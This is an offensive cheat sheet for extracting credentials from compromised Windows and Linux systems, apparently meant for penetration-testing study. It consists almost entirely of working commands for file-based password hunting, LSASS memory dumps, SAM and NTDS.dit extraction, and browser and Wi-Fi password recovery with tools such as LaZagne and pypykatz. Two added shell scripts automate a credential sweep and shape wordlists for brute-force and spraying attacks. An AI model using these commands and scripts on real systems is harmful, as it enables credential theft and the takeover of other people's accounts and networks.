Credential Theft Techniques
This guide outlines common methods for discovering and extracting credentials from compromised systems. These techniques focus on searching for sensitive data within files, system memory, and application-specific storage. The primary goal is to identify passwords, API keys, connection strings, and other secrets that can be used for privilege escalation or lateral movement.
File-Based Credential Hunting
This method involves searching the filesystem for plaintext or lightly-obfuscated credentials stored in configuration files, scripts, and user documents.
| Command | Description |
|---|---|
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml | Uses the built-in Windows findstr utility to search for the literal string "password" in common configuration and text files. /S searches subdirectories, /I makes the match case-insensitive and /M prints only the name of each matching file instead of every matching line. Run it from the drive root or from a user profile to set the scope. |
| Get-Content 'C:\Users\...\Custom Dictionary.txt' \| Select-String "password" | (PowerShell) Searches for the string "password" in Google Chrome's custom dictionary file (kept under the user's Chrome profile), where users sometimes add a password by mistake after the spell-checker underlines it. |
| (Get-PSReadLineOption).HistorySavePath | (PowerShell) Prints the path of the PSReadLine history file, which persists commands typed in previous PowerShell sessions (Get-History only covers the current session). |
| Get-Content (Get-PSReadLineOption).HistorySavePath | (PowerShell) Reads the PowerShell history file, which may contain credentials passed as command-line arguments in earlier sessions. |
| $credential = Import-Clixml -Path 'C:\scripts\pass.xml' | (PowerShell) Deserializes a credential object from a CLIXML file. If an administrator saved a PSCredential with Export-Clixml, this loads it back into the session. The password is a SecureString protected with DPAPI, so the file only decrypts when imported by the same user account on the same machine that created it; once loaded, the plaintext is available through the object's GetNetworkCredential() method. |
| findstr /SPIN "password" *.* | A more thorough findstr: /S searches subdirectories, /P skips files that contain non-printable characters (so binaries are not searched), /I is case-insensitive and /N prefixes each hit with its line number. *.* covers every file. |
| Select-String -Path C:\Users\user\Documents\*.txt -Pattern "password" | (PowerShell) The PowerShell alternative to findstr for searching file contents. -Pattern is a case-insensitive regular expression by default; pipe Get-ChildItem -Recurse into Select-String to cover subdirectories. |
| dir /S /B *pass*.txt *pass*.xml *pass*.ini *.cred *.vnc *.config | Recursively (/S) searches from the current directory for files whose names or extensions suggest stored credentials and prints them in bare format (/B, full paths only). Run it from C:\ to cover the whole drive. |
| where /R C:\ *.config | Searches recursively (/R) from the root of C:\ for files with the .config extension. Useful for quickly locating application configuration files, which frequently hold connection strings. |
| Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction SilentlyContinue | (PowerShell) Recursively searches C:\ for files with specific extensions (.rdp, .config, .vnc, .cred) while suppressing access-denied errors. -Include only filters when combined with -Recurse or a wildcard path. |
| cmdkey /list | Lists the entries stored in the Windows Credential Manager for the current user (RDP, network share and generic credentials). The passwords themselves are not displayed, but a saved entry can still be used by anything that consumes it, for example runas with the /savecred switch. |
| netsh wlan show profile | Lists the Wi-Fi network profiles (SSIDs) saved on the machine. |
| netsh wlan show profile "SSID-Name" key=clear | Shows the stored pre-shared key in plaintext (key=clear) for the named profile, under "Key Content" in the Security settings section of the output. |
| Command | Description |
|---|---|
| .\SharpChrome.exe logins | A .NET tool (part of the SharpDPAPI project) that decrypts the saved logins in Google Chrome's Login Data database using the current user's DPAPI keys. |
| .\lazagne.exe -h | Displays the help menu for LaZagne, a popular open-source tool for recovering passwords stored on a local computer. |
| .\lazagne.exe all | Executes all available LaZagne modules to recover passwords from browsers, Git, databases, chat clients and more. |
| Invoke-SessionGopher -Target WIN-SRV01 | (PowerShell) SessionGopher hunts for saved session information of remote access tools such as PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP, extracting hostnames, usernames and private keys. -Target runs the search against a remote host. |
Windows Local Password Attacks
These techniques target the LSASS process in memory and the on-disk password stores (the SAM and SECURITY registry hives on any Windows host, NTDS.dit on a Domain Controller) to extract password hashes and other credentials. All of them require local administrator rights.
| Command | Description |
|---|---|
| tasklist /SVC | Lists all running processes with the services hosted inside each one. Useful for identifying lsass.exe and its Process ID (PID). |
| Get-Process lsass | (PowerShell) Retrieves the Local Security Authority Subsystem Service (LSASS) process, including its PID, which the dump command below needs. |
| rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full | Creates a full memory dump of the process whose PID is given (the LSASS PID from the previous commands) using the MiniDump export of the built-in comsvcs.dll and writes it to C:\lsass.dmp for offline extraction. Requires an elevated prompt (SeDebugPrivilege), fails when LSA protection (RunAsPPL) is enabled, and opening lsass.exe memory is a standard EDR detection. |
| reg.exe save hklm\sam C:\sam.save | Saves a copy of the Security Account Manager (SAM) registry hive; requires administrative rights. The local password hashes in it are encrypted with a key derived from the SYSTEM hive, so save hklm\system the same way; the SECURITY hive (hklm\security) additionally holds LSA secrets and cached domain logons. |
| vssadmin CREATE SHADOW /For=C: | Creates a Volume Shadow Copy of the C: drive so that files locked by the operating system, such as NTDS.dit on a Domain Controller, can be copied from the snapshot. Requires an elevated prompt and is only available on Windows Server editions; the output reports the shadow copy's device name, which the next command uses. |
| copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\NTDS.dit C:\NTDS.dit | Copies the locked NTDS.dit file out of the shadow copy, where X is the shadow copy number reported by vssadmin. The database is encrypted with the boot key, so also copy the SYSTEM hive (Windows\System32\config\SYSTEM from the same shadow copy, or reg.exe save hklm\system) for offline extraction. |
Offline Analysis
| Command | Description |
|---|---|
| pypykatz lsa minidump /path/to/lsass.dmp | (On the attacker machine) A pure-Python implementation of Mimikatz's parsing logic. Reads the lsass.dmp file and prints the logon sessions it finds, including NT hashes, Kerberos tickets and any plaintext passwords that were cached (for example when WDigest caching is enabled). |
| secretsdump.py -sam sam.save -system system.save -security security.save LOCAL | (On the attacker machine) Impacket's secretsdump parses the saved SAM, SYSTEM and SECURITY hives offline (the LOCAL keyword means no target host) and prints local hashes, LSA secrets and cached domain credentials for cracking. The same tool parses a copied NTDS.dit when given -ntds together with the SYSTEM hive. |
Linux Local Password Attacks
These methods focus on finding credentials and sensitive information on Linux-based systems.
| Command | Description |
|---|---|
| find / -name "*.conf" -o -name "*.config" -o -name "*.cnf" 2>/dev/null | Searches the entire filesystem for common configuration file extensions. Errors (mostly permission denied) are redirected to /dev/null to keep the output clean. |
| grep -ri -e user -e pass /etc 2>/dev/null | Recursively and case-insensitively searches every file under /etc for lines containing "user" or "pass" (which also covers "password" and "passwd"). Each -e adds a pattern; the alternation form "user\|password\|pass" only works with -E, because a plain grep treats the pipe character literally. |
| find / -name "*.sql" -o -name "*.db" 2>/dev/null | Searches for common database file extensions; SQLite files in particular often hold application credentials. |
| find /home -type f -name "*.txt" 2>/dev/null | Searches for all .txt files within user home directories. |
| cat /etc/crontab | Displays the system-wide crontab. Cron jobs frequently call scripts with hardcoded credentials. |
| ls -la /etc/cron.* | Lists the cron directories (cron.d, cron.daily, cron.hourly, ...) to find the scheduled scripts themselves. |
| grep -rnw "PRIVATE KEY" / 2>/dev/null | Recursively searches the filesystem for files containing the string "PRIVATE KEY" to discover SSH and TLS private keys. Scanning from / is slow; start with /home, /root, /etc and /opt when time matters. |
| grep -rnw "ssh-rsa" /home/*/.ssh/id_rsa.pub 2>/dev/null | Reads public keys; the comment at the end of each key usually names user@host, revealing usernames and the hosts the key is used from. |
| history or cat ~/.bash_history | Displays the command history, which may contain passwords passed on the command line. history covers the current shell session; the file holds earlier sessions. Check other shells' and tools' history files too (.zsh_history, .python_history, .mysql_history). |
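The Windows findstr/dir one-liners in the File-Based Credential Hunting section and the find/grep one-liners here are the same technique: look for files whose names suggest stored secrets, then look for contents that do. As an added example (not from the original page), the following POSIX shell script combines both into one sweep with a content pattern that only fires when a keyword is followed by an actual value, a private key header, or a URL with embedded user:pass@host, which cuts most of the noise the bare word "password" produces. The name globs, the regex and the sample directory tree are all constructed for illustration and should be tuned to the target.

```shell
#!/bin/sh
# Added example, not part of the original page: a combined name + content
# credential sweep. Patterns and the sample tree are constructed.

# Content regex (ERE, matched case-insensitively). A keyword alone is noise:
# require a separator and a value of 4+ non-space characters, or a private
# key header, or a URL that embeds credentials.
CRED_PATTERN="(password|passwd|pwd|secret|api[_-]?key|token)[[:space:]]*[=:][[:space:]]*[\"']?[^[:space:]\"']{4,}"
CRED_PATTERN="$CRED_PATTERN|-----BEGIN [A-Z ]*PRIVATE KEY-----"
CRED_PATTERN="$CRED_PATTERN|[a-z]+://[^/[:space:]:@]+:[^@[:space:]]+@"

# Files worth opening because of their name alone (the dir /S /B and
# find -name equivalents). -xdev keeps the walk on one filesystem.
hunt_by_name() {
    find "$1" -xdev -type f \( -iname '*pass*' -o -iname '*.cred' -o -iname '*.rdp' \
        -o -iname '*.vnc' -o -iname '*.config' -o -iname '*.conf' -o -iname '*.cnf' \
        -o -iname '*.ini' -o -iname '*.env' -o -iname '*.pem' -o -name 'id_rsa' \
        -o -name 'id_ed25519' -o -name '*_history' \) 2>/dev/null
}

# file:line:text for content hits. -I skips binaries (the findstr /P
# equivalent); pseudo-filesystems are excluded so the sweep can be pointed
# at / without hanging on /proc.
hunt_by_content() {
    grep -rnIEi --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev \
         -e "$CRED_PATTERN" "$1" 2>/dev/null
}

# Constructed sample tree: two true positives by name, three by content, one
# binary that must be skipped and one "password" sentence that must not match.
make_sample_tree() {
    d=$1
    mkdir -p "$d/app" "$d/home/jdoe/.ssh"
    printf '<add key="Db" value="Server=db;User Id=sa;Password=Summer2024!" />\n' > "$d/app/app.config"
    printf 'remember to change your password before Friday\n' > "$d/home/jdoe/notes.txt"
    printf 'db: mysql://admin:hunter2@db.internal/app\n' >> "$d/home/jdoe/notes.txt"
    printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA\n-----END OPENSSH PRIVATE KEY-----\n' > "$d/home/jdoe/.ssh/id_rsa"
    printf 'username:s:CORP\\jdoe\n' > "$d/home/jdoe/backup.rdp"
    printf 'password=binarysecret\000\n' > "$d/app/cache.bin"
}

# Usage: ./hunt.sh /path/to/root   (or  ./hunt.sh --demo  for the sample tree)
main() {
    root=$1
    if [ "$root" = "--demo" ]; then root=$(mktemp -d); make_sample_tree "$root"; fi
    echo "== name matches under $root";    hunt_by_name "$root"
    echo "== content matches under $root"; hunt_by_content "$root"
}

case "${1:-}" in
    "") ;;            # sourced or run without arguments: only define functions
    *)  main "$1" ;;
esac
```

On the sample tree the name search returns app.config, backup.rdp and id_rsa, and the content search returns the connection string, the mysql:// URL and the key header while ignoring the sentence that merely mentions a password and the binary cache file.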
| Command | Description |
|---|---|
| ./mimipenguin.sh or python mimipenguin.py | A Linux tool inspired by Mimikatz that dumps cleartext logins from the memory of processes such as the display manager and sshd. Needs root. |
| python lazagne.py all | Runs the Linux version of LaZagne to extract passwords from browsers, system accounts and various applications. |
| cat ~/.mozilla/firefox/*.default-release/logins.json \| jq . | Pretty-prints the logins.json file from a Firefox profile. It is plain JSON, so hostnames and timestamps are readable, but the encryptedUsername and encryptedPassword fields are encrypted with a key kept in the profile's key4.db and need the next tool to decrypt. |
| python3 firefox_decrypt.py | Decrypts the saved logins using logins.json and key4.db from the profile. Prompts for the master password if one is set; otherwise it recovers the credentials directly. |
Customizing Wordlists with Grep and Sed
This section covers how to refine password wordlists to match specific password policies, increasing the efficiency of brute-force and password-spraying attacks.
| Policy Requirement | Command | Explanation |
|---|---|---|
| Minimum Length (e.g., 8) | grep -E '^.{8,}$' wordlist.txt | Keeps lines with 8 or more characters. -E is required for the {8,} interval. |
| At Least One Uppercase | grep '[A-Z]' wordlist.txt | Keeps lines that contain at least one uppercase letter. Run with LC_ALL=C so the range matches only ASCII uppercase regardless of locale. |
| At Least One Lowercase | grep '[a-z]' wordlist.txt | Keeps lines that contain at least one lowercase letter. |
| At Least One Digit | grep '[0-9]' wordlist.txt | Keeps lines that contain at least one digit. |
| At Least One Special Char | grep '[!@#$%^&*()]' wordlist.txt | Keeps lines containing at least one character from the listed set; use '[[:punct:]]' instead to accept any ASCII punctuation. |
| No Consecutive Repeats | grep -vE '(.)\1' wordlist.txt | Inverts the match (-v) to remove lines in which any character appears twice in a row. \1 is a back-reference, supported by GNU grep. |
| Combination of Policies | grep -E '^.{8,}$' wordlist.txt \| grep '[A-Z]' \| grep '[0-9]' | Chains greps: each stage only sees what the previous one kept, so the result has at least 8 characters AND an uppercase letter AND a digit. Redirect the output to a new file rather than back into wordlist.txt. |
| Keep Only Lines with Numbers | sed -i '/[0-9]/!d' wordlist.txt | Modifies the file in place (-i, GNU sed syntax). Deletes (d) every line that does not (!) match the address, i.e. every line without a digit. |
| Keep Only Lines with Special Chars | sed -i '/[[:punct:]]/!d' wordlist.txt | Same pattern: deletes every line with no punctuation character. [[:punct:]] covers the ASCII ranges !-/ :-@ [-` and {-~ that a hand-written character class would otherwise have to spell out (and escape, since / is the address delimiter). |
| Remove Lines Shorter Than 8 | sed -i -E '/^.{1,7}$/d' wordlist.txt | Deletes every line of 1 to 7 characters, enforcing a minimum length of 8. -E is required because in sed's default basic syntax {1,7} is matched literally; use {0,7} to drop empty lines as well. |
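Chaining the filters by hand is error-prone (a forgotten -E silently keeps everything, and a typo in the special-character class silently drops everything). As an added example (not from the original page), the following POSIX shell script wraps the rules in this section into one policy function that reads a wordlist on stdin, plus an in-place variant that applies the corrected sed rules. The sample wordlist is constructed, and the length threshold is a parameter so the same function serves any policy.

```shell
#!/bin/sh
# Added example, not part of the original page: the grep/sed wordlist
# filters chained into one policy, with -E for intervals and [[:punct:]]
# for the special-character set. The sample wordlist is constructed.

# Keep lines meeting: length >= $1 (default 8), at least one uppercase,
# one lowercase, one digit and one punctuation character, and no
# character repeated twice in a row. Wordlist on stdin, survivors on stdout.
# LC_ALL=C pins [A-Z]/[a-z] to ASCII whatever the system locale is.
filter_policy() {
    min=${1:-8}
    LC_ALL=C grep -E '^.{'"$min"',}$' \
      | LC_ALL=C grep '[A-Z]' \
      | LC_ALL=C grep '[a-z]' \
      | grep '[0-9]' \
      | grep '[[:punct:]]' \
      | grep -vE '(.)\1'
}

# In-place variant of the two sed rules from the table (GNU sed -i):
# drop lines shorter than $2, then drop lines without punctuation.
trim_in_place() {
    file=$1; min=${2:-8}
    sed -i -E '/^.{0,'"$((min-1))"'}$/d' "$file"   # -E: {0,n} is an interval
    sed -i '/[[:punct:]]/!d' "$file"               # keep only lines with punctuation
}

# Constructed sample: every line fails exactly one rule except the last two
# survivors. Password1! and P@ssw0rd only fail the no-repeat rule (ss).
sample_wordlist() {
    cat <<'EOF'
password
Password1
Password1!
P@ssw0rd
Summer2024!
Winter2024!
Qwerty!2
qwerty!2
Aa1!
EOF
}

# Usage: ./policy.sh wordlist.txt [minlen]   (or  ./policy.sh --demo)
case "${1:-}" in
    "")      ;;                                   # sourced: only define functions
    --demo)  sample_wordlist | filter_policy 8 ;; # prints Winter2024! and Qwerty!2
    *)       filter_policy "${2:-8}" < "$1" ;;
esac
```

With the sample list and a minimum length of 8, only Winter2024! and Qwerty!2 survive; raising the minimum to 9 leaves Winter2024! alone. The in-place trim, by contrast, only applies the two sed rules, so it keeps six of the nine sample lines, which is a useful sanity check that each rule is doing what its regex claims.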